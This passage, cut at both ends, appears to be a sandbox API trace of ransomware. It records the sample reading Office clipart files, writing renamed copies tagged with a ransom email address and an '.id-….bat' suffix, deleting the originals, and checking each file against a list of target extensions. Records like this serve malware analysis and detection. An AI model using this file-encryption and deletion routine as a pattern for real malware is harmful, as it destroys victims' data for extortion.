"c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg")) returned 0x220 [0188.135] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0188.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0188.135] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.135] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0188.136] GetLastError () returned 0x0 [0188.136] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x107d4, lpOverlapped=0x0) returned 1 [0188.281] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x107e0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x107e0, lpOverlapped=0x0) returned 1 [0188.283] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.283] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.283] SetEndOfFile (hFile=0x37c) returned 1 [0188.283] CloseHandle (hObject=0x37c) returned 1 [0188.283] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.283] SetEndOfFile (hFile=0x378) returned 1 [0188.284] CloseHandle (hObject=0x378) returned 1 [0188.285] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0189.497] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg")) returned 1 [0189.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.497] lstrlenW (lpString=".doc") returned 4 [0189.497] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0189.497] lstrlenW (lpString=".docx") returned 5 [0189.497] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0189.497] lstrlenW (lpString=".pdf") returned 4 [0189.497] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0189.497] lstrlenW (lpString=".xls") returned 4 [0189.498] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0189.498] lstrlenW (lpString=".xlsx") returned 5 [0189.498] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0189.498] lstrlenW (lpString=".ppt") returned 4 [0189.498] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0189.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.498] lstrlenW (lpString=".zip") returned 4 [0189.498] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0189.498] lstrlenW (lpString=".rar") returned 4 [0189.498] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0189.498] lstrlenW (lpString=".bz2") returned 4 [0189.498] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0189.498] lstrlenW (lpString=".7z") returned 3 [0189.498] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0189.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.498] lstrlenW (lpString=".dbf") returned 4 [0189.498] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0189.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.498] lstrlenW (lpString=".1cd") returned 4 [0189.498] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0189.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.498] lstrlenW (lpString=".jpg") returned 4 [0189.498] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0189.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.498] lstrlenW (lpString=".doc") returned 4 [0189.498] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0189.498] lstrlenW (lpString=".docx") returned 5 [0189.498] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0189.498] lstrlenW (lpString=".pdf") returned 4 [0189.498] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0189.498] lstrlenW (lpString=".xls") returned 4 [0189.499] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0189.499] lstrlenW (lpString=".xlsx") returned 5 [0189.499] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0189.499] lstrlenW (lpString=".ppt") returned 4 [0189.499] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0189.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.499] lstrlenW (lpString=".zip") returned 4 [0189.499] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0189.499] lstrlenW (lpString=".rar") returned 4 [0189.499] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0189.499] lstrlenW (lpString=".bz2") returned 4 [0189.499] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0189.499] lstrlenW (lpString=".7z") returned 3 [0189.499] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0189.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.499] lstrlenW (lpString=".dbf") returned 4 [0189.499] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0189.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.499] lstrlenW (lpString=".1cd") returned 4 [0189.499] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0189.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 68 [0189.499] lstrlenW (lpString=".jpg") returned 4 [0189.499] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0189.499] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0189.500] lstrlenW (lpString="J0150861.WMF") returned 12 [0189.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0189.500] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=8494) returned 1 [0189.500] CloseHandle (hObject=0x368) returned 1 [0189.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf")) returned 0x220 [0189.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0189.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0189.501] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.501] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0189.501] GetLastError () returned 0x0 [0189.501] ReadFile (in: hFile=0x368, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x212e, lpOverlapped=0x0) returned 1 [0190.461] WriteFile (in: hFile=0x364, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x2130, lpOverlapped=0x0) returned 1 [0190.749] ReadFile (in: hFile=0x368, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0190.749] WriteFile (in: hFile=0x364, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0190.749] SetEndOfFile (hFile=0x364) returned 1 [0190.749] CloseHandle (hObject=0x364) returned 1 [0190.749] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.749] SetEndOfFile (hFile=0x368) returned 1 [0190.750] CloseHandle (hObject=0x368) returned 1 [0190.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0190.900] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf")) returned 1 [0190.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.900] lstrlenW (lpString=".doc") returned 4 [0190.901] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0190.901] lstrlenW (lpString=".docx") returned 5 [0190.901] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0190.901] lstrlenW (lpString=".pdf") returned 4 [0190.901] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0190.901] lstrlenW (lpString=".xls") returned 4 [0190.901] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0190.901] lstrlenW (lpString=".xlsx") returned 5 [0190.901] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0190.901] lstrlenW (lpString=".ppt") returned 4 [0190.901] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0190.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.901] lstrlenW (lpString=".zip") returned 4 [0190.901] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0190.901] lstrlenW (lpString=".rar") returned 4 [0190.901] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0190.901] lstrlenW (lpString=".bz2") returned 4 [0190.901] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0190.901] lstrlenW (lpString=".7z") returned 3 [0190.901] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0190.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.901] lstrlenW (lpString=".dbf") returned 4 [0190.901] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0190.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.902] lstrlenW (lpString=".1cd") returned 4 [0190.902] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0190.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.902] lstrlenW (lpString=".jpg") returned 4 [0190.902] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0190.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.902] lstrlenW (lpString=".doc") returned 4 [0190.902] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0190.902] lstrlenW (lpString=".docx") returned 5 [0190.902] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0190.902] lstrlenW (lpString=".pdf") returned 4 [0190.902] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0190.902] lstrlenW (lpString=".xls") returned 4 [0190.902] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0190.902] lstrlenW (lpString=".xlsx") returned 5 [0190.902] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0190.902] lstrlenW (lpString=".ppt") returned 4 [0190.902] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0190.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.902] lstrlenW (lpString=".zip") returned 4 [0190.902] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0190.902] lstrlenW (lpString=".rar") returned 4 [0190.903] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0190.903] lstrlenW (lpString=".bz2") returned 4 [0190.903] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0190.903] lstrlenW (lpString=".7z") returned 3 [0190.903] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0190.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.903] lstrlenW (lpString=".dbf") returned 4 [0190.903] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0190.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.903] lstrlenW (lpString=".1cd") returned 4 [0190.903] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0190.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 68 [0190.903] lstrlenW (lpString=".jpg") returned 4 [0190.903] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0190.903] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0190.903] lstrlenW (lpString="J0151061.WMF") returned 12 [0190.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0190.904] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=6752) returned 1 [0190.904] CloseHandle (hObject=0x380) returned 1 [0190.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf")) returned 0x220 [0190.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0190.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0190.905] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.905] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0190.907] GetLastError () returned 0x0 [0190.907] ReadFile (in: hFile=0x380, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1a60, lpOverlapped=0x0) returned 1 [0191.129] WriteFile (in: hFile=0x388, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1a70, lpOverlapped=0x0) returned 1 [0191.130] ReadFile (in: hFile=0x380, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0191.130] WriteFile (in: hFile=0x388, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0191.130] SetEndOfFile (hFile=0x388) returned 1 [0191.131] CloseHandle (hObject=0x388) returned 1 [0191.131] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0191.131] SetEndOfFile (hFile=0x380) returned 1 [0191.132] CloseHandle (hObject=0x380) returned 1 [0191.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0191.132] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf")) returned 1 [0191.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.132] lstrlenW (lpString=".doc") returned 4 [0191.133] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0191.133] lstrlenW (lpString=".docx") returned 5 [0191.133] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0191.133] lstrlenW (lpString=".pdf") returned 4 [0191.133] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0191.133] lstrlenW (lpString=".xls") returned 4 [0191.133] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0191.133] lstrlenW (lpString=".xlsx") returned 5 [0191.133] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0191.133] lstrlenW (lpString=".ppt") returned 4 [0191.133] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0191.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.133] lstrlenW (lpString=".zip") returned 4 [0191.133] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0191.133] lstrlenW (lpString=".rar") returned 4 [0191.133] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0191.133] lstrlenW (lpString=".bz2") returned 4 [0191.133] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0191.133] lstrlenW (lpString=".7z") returned 3 [0191.133] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0191.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.133] lstrlenW (lpString=".dbf") returned 4 [0191.133] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0191.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.133] lstrlenW (lpString=".1cd") returned 4 [0191.133] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0191.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.133] lstrlenW (lpString=".jpg") returned 4 [0191.133] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0191.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.134] lstrlenW (lpString=".doc") returned 4 [0191.134] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0191.134] lstrlenW (lpString=".docx") returned 5 [0191.134] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0191.134] lstrlenW (lpString=".pdf") returned 4 [0191.134] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0191.134] lstrlenW (lpString=".xls") returned 4 [0191.134] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0191.134] lstrlenW (lpString=".xlsx") returned 5 [0191.134] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0191.134] lstrlenW (lpString=".ppt") returned 4 [0191.134] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0191.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.134] lstrlenW (lpString=".zip") returned 4 [0191.134] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0191.134] lstrlenW (lpString=".rar") returned 4 [0191.134] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0191.134] lstrlenW (lpString=".bz2") returned 4 [0191.134] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0191.134] lstrlenW (lpString=".7z") returned 3 [0191.134] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0191.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.134] lstrlenW (lpString=".dbf") returned 4 [0191.134] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0191.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.135] lstrlenW (lpString=".1cd") returned 4 [0191.135] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0191.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF") returned 68 [0191.135] lstrlenW (lpString=".jpg") returned 4 [0191.135] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0191.135] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0191.135] lstrlenW (lpString="J0151581.WMF") returned 12 [0191.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0191.139] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=10752) returned 1 [0191.139] CloseHandle (hObject=0x380) returned 1 [0191.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf")) returned 0x220 [0191.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0191.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf"), dwDesiredAccess=0xc0000000, 